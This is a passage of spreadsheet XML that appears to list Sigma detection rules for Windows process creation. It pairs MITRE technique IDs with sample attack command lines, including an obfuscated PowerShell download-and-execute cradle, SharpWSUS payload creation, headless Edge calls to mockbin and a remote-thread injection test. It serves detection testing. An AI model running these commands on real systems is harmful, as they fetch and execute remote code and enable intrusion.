          <t>cmd.exe /c "C:\Windows\TEMP\HiddenPath\23.6.8.8644\3c41d689-bbf5-4216-b2f4-ba8fd6192c25run.cmd"</t>
        </is>
      </c>
      <c r="F4577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4577" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4577" s="43" t="n"/>
      <c r="J4577" s="43" t="n"/>
      <c r="K4577" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4578" ht="15.75" customHeight="1" s="42">
      <c r="A4578" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B4578" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_inline_win_api_access</t>
        </is>
      </c>
      <c r="C4578" s="43" t="inlineStr">
        <is>
          <t>Potential WinAPI Calls Via CommandLine</t>
        </is>
      </c>
      <c r="D4578" s="43" t="inlineStr">
        <is>
          <t>ba3f5c1b-6272-4119-9dbd-0bc8d21c2702</t>
        </is>
      </c>
      <c r="E4578" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; { $p = Start-Process C:\Windows\System32\werfault.exe -passthru; &amp; "C:\AtomicRedTeam\atomics\T1055\bin\x64\Create""Remote""Thread.exe" -pid $p.Id -debug }</t>
        </is>
      </c>
      <c r="F4578" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4578" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4578" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4578" s="43" t="n"/>
      <c r="J4578" s="43" t="n"/>
      <c r="K4578" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4579" ht="15.75" customHeight="1" s="42">
      <c r="A4579" s="43" t="inlineStr">
        <is>
          <t>t1106</t>
        </is>
      </c>
      <c r="B4579" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_inline_win_api_access</t>
        </is>
      </c>
      <c r="C4579" s="43" t="inlineStr">
        <is>
          <t>Potential WinAPI Calls Via CommandLine</t>
        </is>
      </c>
      <c r="D4579" s="43" t="inlineStr">
        <is>
          <t>ba3f5c1b-6272-4119-9dbd-0bc8d21c2702</t>
        </is>
      </c>
      <c r="E4579" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$h = [System.Convert]::FromBase64String('aGVsbG8='); iex(New-Object Net.WebClient).DownloadString([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL1MzY3VyM1RoMXNTaDF0L0dldC1TeXN0ZW0tVGVjaG5pcXVlcy9tYXN0ZXIvVXNvRExML0dldC1Vc29DbGllbnRETExTeXN0ZW0uYHMx')))}</t>
        </is>
      </c>
      <c r="F4579" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4579" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4579" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4579" s="43" t="n"/>
      <c r="J4579" s="43" t="n"/>
      <c r="K4579" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4580" ht="15.75" customHeight="1" s="42">
      <c r="A4580" s="43" t="inlineStr">
        <is>
          <t>t1204.004</t>
        </is>
      </c>
      <c r="B4580" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_filefix_browsers</t>
        </is>
      </c>
      <c r="C4580" s="43" t="inlineStr">
        <is>
          <t>FileFix - Suspicious Child Process from Browser File Upload Abuse</t>
        </is>
      </c>
      <c r="D4580" s="43" t="inlineStr">
        <is>
          <t>4be03877-d5b6-4520-85c9-a5911c0a656c</t>
        </is>
      </c>
      <c r="E4580" s="43" t="inlineStr">
        <is>
          <t>file:///C:/Windows/explorer.exe#"C:\Windows\System32\cmd.exe /c calc.exe"</t>
        </is>
      </c>
      <c r="F4580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4580" s="43" t="n"/>
      <c r="J4580" s="43" t="n"/>
      <c r="K4580" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4581" ht="15.75" customHeight="1" s="42">
      <c r="A4581" s="43" t="inlineStr">
        <is>
          <t>t1210</t>
        </is>
      </c>
      <c r="B4581" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpwsus_wsuspendu_execution</t>
        </is>
      </c>
      <c r="C4581" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpWSUS/WSUSpendu Execution</t>
        </is>
      </c>
      <c r="D4581" s="43" t="inlineStr">
        <is>
          <t>b0ce780f-10bd-496d-9067-066d23dc3aa5</t>
        </is>
      </c>
      <c r="E4581" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "SharpWSUS.exe c^reate /p^ayload:C:\temp\payload.exe"</t>
        </is>
      </c>
      <c r="F4581" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4581" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4581" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4581" s="43" t="n"/>
      <c r="J4581" s="43" t="n"/>
      <c r="K4581" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4582" ht="15.75" customHeight="1" s="42">
      <c r="A4582" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4582" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C4582" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D4582" s="43" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E4582" s="43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F4582" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4582" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4582" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4582" s="43" t="n"/>
      <c r="J4582" s="43" t="n"/>
      <c r="K4582" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4583" ht="15.75" customHeight="1" s="42">
      <c r="A4583" s="43" t="inlineStr">
        <is>
          <t>t1569.002</t>
        </is>
      </c>
      <c r="B4583" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_nircmd</t>
        </is>
      </c>
      <c r="C4583" s="43" t="inlineStr">
        <is>
          <t>PUA - NirCmd Execution</t>
        </is>
      </c>
      <c r="D4583" s="43" t="inlineStr">
        <is>
          <t>4e2ed651-1906-4a59-a78a-18220fca1b22</t>
        </is>
      </c>
      <c r="E4583" s="43" t="inlineStr">
        <is>
          <t>nircmd.exe "execmd" calc.exe</t>
        </is>
      </c>
      <c r="F4583" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4583" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4583" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4583" s="43" t="n"/>
      <c r="J4583" s="43" t="n"/>
      <c r="K4583" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4584" ht="15.75" customHeight="1" s="42">
      <c r="A4584" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B4584" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_mockbin_abuse</t>
        </is>
      </c>
      <c r="C4584" s="43" t="inlineStr">
        <is>
          <t>Chromium Browser Headless Execution To Mockbin Like Site</t>
        </is>
      </c>
      <c r="D4584" s="43" t="inlineStr">
        <is>
          <t>1c526788-0abe-4713-862f-b520da5e5316</t>
        </is>
      </c>
      <c r="E4584" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --head^less=new --disable-gpu https://mockbin.org/bin/31b1332f-8f5c-490e-8ec0-78e77b4e5709</t>
        </is>
      </c>
      <c r="F4584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4584" s="34" t="b">
        <v>0</v>
      </c>
      <c r="H4584" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4584" s="43" t="n"/>
      <c r="J4584" s="43" t="n"/>
      <c r="K4584" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4585" ht="15.75" customHeight="1" s="42">
      <c r="A4585" s="43" t="inlineStr">
        <is>
          <t>t1620</t>
        </is>
      </c>
      <c r="B4585" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_mockbin_abuse</t>
        </is>
      </c>
      <c r="C4585" s="43" t="inlineStr">
        <is>
          <t>Chromium Browser Headless Execution To Mockbin Like Site</t>
        </is>
      </c>
      <c r="D4585" s="43" t="inlineStr">
        <is>
          <t>1c526788-0abe-4713-862f-b520da5e5316</t>
        </is>
      </c>
      <c r="E4585" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-gpu https://mock^bin.org/bin/31b1332f-8f5c-490e-8ec0-78e77b4e5709</t>
        </is>
      </c>
      <c r="F4585" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G4585" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H4585" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4585" s="43" t="n"/>
      <c r="J4585" s="43" t="n"/>
      <c r="K4585" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4586" ht="15.75" customHeight="1" s="42">
      <c r="A4586" s="44" t="n"/>
      <c r="B4586" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_devinit_lolbin_usage</t>
        </is>
      </c>
      <c r="C4586" s="44" t="inlineStr">
        <is>
          <t>Arbitrary MSI Download Via Devinit.EXE</t>
        </is>
      </c>
      <c r="D4586" s="44" t="inlineStr">
        <is>
          <t>90d50722-0483-4065-8e35-57efaadd354d</t>
        </is>
      </c>
      <c r="E4586" s="44" t="n"/>
      <c r="F4586" s="44" t="n"/>
      <c r="G4586" s="44" t="n"/>
      <c r="H4586" s="44" t="n"/>
      <c r="I4586" s="44" t="n"/>
      <c r="J4586" s="44" t="n"/>
      <c r="K4586" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4587" ht="15.75" customHeight="1" s="42">
      <c r="A4587" s="44" t="n"/>
      <c r="B4587" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ksetup_password_change_computer</t>
        </is>
      </c>
      <c r="C4587" s="44" t="inlineStr">
        <is>
          <t>Computer Password Change Via Ksetup.EXE</t>
        </is>
      </c>
      <c r="D4587" s="44" t="inlineStr">
        <is>
          <t>de16d92c-c446-4d53-8938-10aeef41c8b6</t>
        </is>
      </c>
      <c r="E4587" s="44" t="n"/>
      <c r="F4587" s="44" t="n"/>
      <c r="G4587" s="44" t="n"/>
      <c r="H4587" s="44" t="n"/>
      <c r="I4587" s="44" t="n"/>
      <c r="J4587" s="44" t="n"/>
      <c r="K4587" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4588" ht="15.75" customHeight="1" s="42">
      <c r="A4588" s="44" t="n"/>
      <c r="B4588" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ksetup_password_change_user</t>
        </is>
      </c>
      <c r="C4588" s="44" t="inlineStr">
        <is>
          <t>Logged-On User Password Change Via Ksetup.EXE</t>
        </is>
      </c>
      <c r="D4588" s="44" t="inlineStr">
        <is>
          <t>c9783e20-4793-4164-ba96-d9ee483992c4</t>
        </is>
      </c>
      <c r="E4588" s="44" t="n"/>
      <c r="F4588" s="44" t="n"/>
      <c r="G4588" s="44" t="n"/>
      <c r="H4588" s="44" t="n"/>
      <c r="I4588" s="44" t="n"/>
      <c r="J4588" s="44" t="n"/>
      <c r="K4588" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4589" ht="15.75" customHeight="1" s="42">
      <c r="A4589" s="44" t="n"/>
      <c r="B4589" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_msdt_answer_file</t>
        </is>
      </c>
      <c r="C4589" s="44" t="inlineStr">
        <is>
          <t>Execute MSDT Via Answer File</t>
        </is>
      </c>
      <c r="D4589" s="44" t="inlineStr">
        <is>
          <t>9c8c7000-3065-44a8-a555-79bcba5d9955</t>
        </is>
      </c>
      <c r="E4589" s="44" t="n"/>
      <c r="F4589" s="44" t="n"/>
      <c r="G4589" s="44" t="n"/>
      <c r="H4589" s="44" t="n"/>
      <c r="I4589" s="44" t="n"/>
      <c r="J4589" s="44" t="n"/>
      <c r="K4589" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4590" ht="15.75" customHeight="1" s="42">
      <c r="A4590" s="44" t="n"/>
      <c r="B4590" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_sftp</t>
        </is>
      </c>
      <c r="C4590" s="44" t="inlineStr">
        <is>
          <t>Use Of The SFTP.EXE Binary As A LOLBIN</t>
        </is>
      </c>
      <c r="D4590" s="44" t="inlineStr">
        <is>
          <t>a85ffc3a-e8fd-4040-93bf-78aff284d801</t>
        </is>
      </c>
      <c r="E4590" s="44" t="n"/>
      <c r="F4590" s="44" t="n"/>
      <c r="G4590" s="44" t="n"/>
      <c r="H4590" s="44" t="n"/>
      <c r="I4590" s="44" t="n"/>
      <c r="J4590" s="44" t="n"/>
      <c r="K4590" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4591" ht="15.75" customHeight="1" s="42">
      <c r="A4591" s="44" t="n"/>
      <c r="B4591" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msedge_proxy_download</t>
        </is>
      </c>
      <c r="C4591" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSEDGE_PROXY.EXE</t>
        </is>
      </c>
      <c r="D4591" s="44" t="inlineStr">
        <is>
          <t>e84d89c4-f544-41ca-a6af-4b92fd38b023</t>
        </is>
      </c>
      <c r="E4591" s="44" t="n"/>
      <c r="F4591" s="44" t="n"/>
      <c r="G4591" s="44" t="n"/>
      <c r="H4591" s="44" t="n"/>
      <c r="I4591" s="44" t="n"/>
      <c r="J4591" s="44" t="n"/>
      <c r="K4591" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4592" ht="15.75" customHeight="1" s="42">
      <c r="A4592" s="44" t="n"/>
      <c r="B4592" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mspub_download</t>
        </is>
      </c>
      <c r="C4592" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSPUB.EXE</t>
        </is>
      </c>
      <c r="D4592" s="44" t="inlineStr">
        <is>
          <t>3b3c7f55-f771-4dd6-8a6e-08d057a17caf</t>
        </is>
      </c>
      <c r="E4592" s="44" t="n"/>
      <c r="F4592" s="44" t="n"/>
      <c r="G4592" s="44" t="n"/>
      <c r="H4592" s="44" t="n"/>
      <c r="I4592" s="44" t="n"/>
      <c r="J4592" s="44" t="n"/>
      <c r="K4592" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4593" ht="15.75" customHeight="1" s="42">
      <c r="A4593" s="44" t="n"/>
      <c r="B4593" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pdqdeploy_runner_susp_children</t>
        </is>
      </c>
      <c r="C4593" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of PDQDeployRunner</t>
        </is>
      </c>
      <c r="D4593" s="44" t="inlineStr">
        <is>
          <t>12b8e9f5-96b2-41e1-9a42-8c6779a5c184</t>
        </is>
      </c>
      <c r="E4593" s="44" t="n"/>
      <c r="F4593" s="44" t="n"/>
      <c r="G4593" s="44" t="n"/>
      <c r="H4593" s="44" t="n"/>
      <c r="I4593" s="44" t="n"/>
      <c r="J4593" s="44" t="n"/>
      <c r="K4593" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4594" ht="15.75" customHeight="1" s="42">
      <c r="A4594" s="44" t="n"/>
      <c r="B4594" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_perl_inline_command_execution</t>
        </is>
      </c>
      <c r="C4594" s="44" t="inlineStr">
        <is>
          <t>Perl Inline Command Execution</t>
        </is>
      </c>
      <c r="D4594" s="44" t="inlineStr">
        <is>
          <t>f426547a-e0f7-441a-b63e-854ac5bdf54d</t>
        </is>
      </c>
      <c r="E4594" s="44" t="n"/>
      <c r="F4594" s="44" t="n"/>
      <c r="G4594" s="44" t="n"/>
      <c r="H4594" s="44" t="n"/>
      <c r="I4594" s="44" t="n"/>
      <c r="J4594" s="44" t="n"/>
      <c r="K4594" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4595" ht="15.75" customHeight="1" s="42">
      <c r="A4595" s="44" t="n"/>
      <c r="B4595" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_add_windows_capability</t>
        </is>
      </c>
      <c r="C4595" s="44" t="inlineStr">
        <is>
          <t>Add Windows Capability Via PowerShell Cmdlet</t>
        </is>
      </c>
      <c r="D4595" s="44" t="inlineStr">
        <is>
          <t>b36d01a3-ddaf-4804-be18-18a6247adfcd</t>
        </is>
      </c>
      <c r="E4595" s="44" t="n"/>
      <c r="F4595" s="44" t="n"/>
      <c r="G4595" s="44" t="n"/>
      <c r="H4595" s="44" t="n"/>
      <c r="I4595" s="44" t="n"/>
      <c r="J4595" s="44" t="n"/>
      <c r="K4595" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4596" ht="15.75" customHeight="1" s="42">
      <c r="A4596" s="44" t="n"/>
      <c r="B4596" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_decrypt_pattern</t>
        </is>
      </c>
      <c r="C4596" s="44" t="inlineStr">
        <is>
          <t>PowerShell Execution With Potential Decryption Capabilities</t>
        </is>
      </c>
      <c r="D4596" s="44" t="inlineStr">
        <is>
          <t>434c08ba-8406-4d15-8b24-782cb071a691</t>
        </is>
      </c>
      <c r="E4596" s="44" t="n"/>
      <c r="F4596" s="44" t="n"/>
      <c r="G4596" s="44" t="n"/>
      <c r="H4596" s="44" t="n"/>
      <c r="I4596" s="44" t="n"/>
      <c r="J4596" s="44" t="n"/>
      <c r="K4596" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4597" ht="15.75" customHeight="1" s="42">
      <c r="A4597" s="44" t="n"/>
      <c r="B4597" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_susp_file_sharing_domains</t>
        </is>
      </c>
      <c r="C4597" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE</t>
        </is>
      </c>
      <c r="D4597" s="44" t="inlineStr">
        <is>
          <t>b6e04788-29e1-4557-bb14-77f761848ab8</t>
        </is>
      </c>
      <c r="E4597" s="44" t="n"/>
      <c r="F4597" s="44" t="n"/>
      <c r="G4597" s="44" t="n"/>
      <c r="H4597" s="44" t="n"/>
      <c r="I4597" s="44" t="n"/>
      <c r="J4597" s="44" t="n"/>
      <c r="K4597" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4598" ht="15.75" customHeight="1" s="42">
      <c r="A4598" s="44" t="n"/>
      <c r="B4598" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_reverse_shell_connection</t>
        </is>
      </c>
      <c r="C4598" s="44" t="inlineStr">
        <is>
          <t>Potential Powershell ReverseShell Connection</t>
        </is>
      </c>
      <c r="D4598" s="44" t="inlineStr">
        <is>
          <t>edc2f8ae-2412-4dfd-b9d5-0c57727e70be</t>
        </is>
      </c>
      <c r="E4598" s="44" t="n"/>
      <c r="F4598" s="44" t="n"/>
      <c r="G4598" s="44" t="n"/>
      <c r="H4598" s="44" t="n"/>
      <c r="I4598" s="44" t="n"/>
      <c r="J4598" s="44" t="n"/>
      <c r="K4598" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4599" ht="15.75" customHeight="1" s="42">
      <c r="A4599" s="44" t="n"/>
      <c r="B4599" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_uncommon_location_exec</t>
        </is>
      </c>
      <c r="C4599" s="44" t="inlineStr">
        <is>
          <t>XBAP Execution From Uncommon Locations Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D4599" s="44" t="inlineStr">
        <is>
          <t>d22e2925-cfd8-463f-96f6-89cec9d9bc5f</t>
        </is>
      </c>
      <c r="E4599" s="44" t="n"/>
      <c r="F4599" s="44" t="n"/>
      <c r="G4599" s="44" t="n"/>
      <c r="H4599" s="44" t="n"/>
      <c r="I4599" s="44" t="n"/>
      <c r="J4599" s="44" t="n"/>
      <c r="K4599" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4600" ht="15.75" customHeight="1" s="42">
      <c r="A4600" s="44" t="n"/>
      <c r="B4600" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rar_susp_greedy_compression</t>
        </is>
      </c>
      <c r="C4600" s="44" t="inlineStr">
        <is>
          <t>Suspicious Greedy Compression Using Rar.EXE</t>
        </is>
      </c>
      <c r="D4600" s="44" t="inlineStr">
        <is>
          <t>afe52666-401e-4a02-b4ff-5d128990b8cb</t>
        </is>
      </c>
      <c r="E4600" s="44" t="n"/>
      <c r="F4600" s="44" t="n"/>
      <c r="G4600" s="44" t="n"/>
      <c r="H4600" s="44" t="n"/>
      <c r="I4600" s="44" t="n"/>
      <c r="J4600" s="44" t="n"/>
      <c r="K4600" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4601" ht="15.75" customHeight="1" s="42">
      <c r="A4601" s="44" t="n"/>
      <c r="B4601" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_squirrel_download</t>
        </is>
      </c>
      <c r="C4601" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via Squirrel.EXE</t>
        </is>
      </c>
      <c r="D4601" s="44" t="inlineStr">
        <is>
          <t>1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c</t>
        </is>
      </c>
      <c r="E4601" s="44" t="n"/>
      <c r="F4601" s="44" t="n"/>
      <c r="G4601" s="44" t="n"/>
      <c r="H4601" s="44" t="n"/>
      <c r="I4601" s="44" t="n"/>
      <c r="J4601" s="44" t="n"/>
      <c r="K4601" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4602" ht="15.75" customHeight="1" s="42">
      <c r="A4602" s="44" t="n"/>
      <c r="B4602" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_squirrel_proxy_execution</t>
        </is>
      </c>
      <c r="C4602" s="44" t="inlineStr">
        <is>
          <t>Process Proxy Execution Via Squirrel.EXE</t>
        </is>
      </c>
      <c r="D4602" s="44" t="inlineStr">
        <is>
          <t>45239e6a-b035-4aaf-b339-8ad379fcb67e</t>
        </is>
      </c>
      <c r="E4602" s="44" t="n"/>
      <c r="F4602" s="44" t="n"/>
      <c r="G4602" s="44" t="n"/>
      <c r="H4602" s="44" t="n"/>
      <c r="I4602" s="44" t="n"/>
      <c r="J4602" s="44" t="n"/>
      <c r="K4602" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4603" ht="15.75" customHeight="1" s="42">
      <c r="A4603" s="44" t="n"/>
      <c r="B4603" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_inline_base64_mz_header</t>
        </is>
      </c>
      <c r="C4603" s="44" t="inlineStr">
        <is>
          <t>Base64 MZ Header In CommandLine</t>
        </is>
      </c>
      <c r="D4603" s="44" t="inlineStr">
        <is>
          <t>22e58743-4ac8-4a9f-bf19-00a0428d8c5f</t>
        </is>
      </c>
      <c r="E4603" s="44" t="n"/>
      <c r="F4603" s="44" t="n"/>
      <c r="G4603" s="44" t="n"/>
      <c r="H4603" s="44" t="n"/>
      <c r="I4603" s="44" t="n"/>
      <c r="J4603" s="44" t="n"/>
      <c r="K4603" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4604" ht="15.75" customHeight="1" s="42">
      <c r="A4604" s="44" t="n"/>
      <c r="B4604" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ms_appinstaller_download</t>
        </is>
      </c>
      <c r="C4604" s="44" t="inlineStr">
        <is>
          <t>Potential File Download Via MS-AppInstaller Protocol Handler</t>
        </is>
      </c>
      <c r="D4604" s="44" t="inlineStr">
        <is>
          <t>180c7c5c-d64b-4a63-86e9-68910451bc8b</t>
        </is>
      </c>
      <c r="E4604" s="44" t="n"/>
      <c r="F4604" s="44" t="n"/>
      <c r="G4604" s="44" t="n"/>
      <c r="H4604" s="44" t="n"/>
      <c r="I4604" s="44" t="n"/>
      <c r="J4604" s="44" t="n"/>
      <c r="K4604" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4605" ht="15.75" customHeight="1" s="42">
      <c r="A4605" s="44" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B4605" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_task_folder_evasion</t>
        </is>
      </c>
      <c r="C4605" s="44" t="inlineStr">
        <is>
          <t>Tasks Folder Evasion</t>
        </is>
      </c>
      <c r="D4605" s="44" t="inlineStr">
        <is>
          <t>cc4e02ba-9c06-48e2-b09e-2500cace9ae0</t>
        </is>
      </c>
      <c r="E4605" s="44" t="n"/>
      <c r="F4605" s="44" t="n"/>
      <c r="G4605" s="44" t="n"/>
      <c r="H4605" s="44" t="n"/>
      <c r="I4605" s="44" t="n"/>
      <c r="J4605" s="44" t="n"/>
      <c r="K4605" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4606" ht="15.75" customHeight="1" s="42">
      <c r="A4606" s="44" t="n"/>
      <c r="B4606" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vmware_toolbox_cmd_persistence</t>
        </is>
      </c>
      <c r="C4606" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script</t>
        </is>
      </c>
      <c r="D4606" s="44" t="inlineStr">
        <is>
          <t>7aa4e81a-a65c-4e10-9f81-b200eb229d7d</t>
        </is>
      </c>
      <c r="E4606" s="44" t="n"/>
      <c r="F4606" s="44" t="n"/>
      <c r="G4606" s="44" t="n"/>
      <c r="H4606" s="44" t="n"/>
      <c r="I4606" s="44" t="n"/>
      <c r="J4606" s="44" t="n"/>
      <c r="K4606" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4607" ht="15.75" customHeight="1" s="42">
      <c r="A4607" s="44" t="n"/>
      <c r="B4607" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vmware_toolbox_cmd_persistence_susp</t>
        </is>
      </c>
      <c r="C4607" s="44" t="inlineStr">
        <is>
          <t>Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script</t>
        </is>
      </c>
      <c r="D4607" s="44" t="inlineStr">
        <is>
          <t>236d8e89-ed95-4789-a982-36f4643738ba</t>
        </is>
      </c>
      <c r="E4607" s="44" t="n"/>
      <c r="F4607" s="44" t="n"/>
      <c r="G4607" s="44" t="n"/>
      <c r="H4607" s="44" t="n"/>
      <c r="I4607" s="44" t="n"/>
      <c r="J4607" s="44" t="n"/>
      <c r="K4607" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4608" ht="15.75" customHeight="1" s="42">
      <c r="A4608" s="44" t="n"/>
      <c r="B4608" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_windows_terminal_susp_children</t>
        </is>
      </c>
      <c r="C4608" s="44" t="inlineStr">
        <is>
          <t>Suspicious WindowsTerminal Child Processes</t>
        </is>
      </c>
      <c r="D4608" s="44" t="inlineStr">
        <is>
          <t>8de89e52-f6e1-4b5b-afd1-41ecfa300d48</t>
        </is>
      </c>
      <c r="E4608" s="44" t="n"/>
      <c r="F4608" s="44" t="n"/>
      <c r="G4608" s="44" t="n"/>
      <c r="H4608" s="44" t="n"/>
      <c r="I4608" s="44" t="n"/>
      <c r="J4608" s="44" t="n"/>
      <c r="K4608" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4609" ht="15.75" customHeight="1" s="42">
      <c r="A4609" s="44" t="n"/>
      <c r="B4609" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_local_install_via_manifest</t>
        </is>
      </c>
      <c r="C4609" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest</t>
        </is>
      </c>
      <c r="D4609" s="44" t="inlineStr">
        <is>
          <t>313d6012-51a0-4d93-8dfc-de8553239e25</t>
        </is>
      </c>
      <c r="E4609" s="44" t="n"/>
      <c r="F4609" s="44" t="n"/>
      <c r="G4609" s="44" t="n"/>
      <c r="H4609" s="44" t="n"/>
      <c r="I4609" s="44" t="n"/>
      <c r="J4609" s="44" t="n"/>
      <c r="K4609" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4610" ht="15.75" customHeight="1" s="42">
      <c r="A4610" s="44" t="n"/>
      <c r="B4610" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_local_install_via_manifest</t>
        </is>
      </c>
      <c r="C4610" s="44" t="inlineStr">
        <is>
          <t>Install New Package Via Winget Local Manifest</t>
        </is>
      </c>
      <c r="D4610" s="44" t="inlineStr">
        <is>
          <t>313d6012-51a0-4d93-8dfc-de8553239e25</t>
        </is>
      </c>
      <c r="E4610" s="44" t="n"/>
      <c r="F4610" s="44" t="n"/>
      <c r="G4610" s="44" t="n"/>
      <c r="H4610" s="44" t="n"/>
      <c r="I4610" s="44" t="n"/>
      <c r="J4610" s="44" t="n"/>
      <c r="K4610" s="44" t="b">
        <v>0</v>
      </c>
    </row>
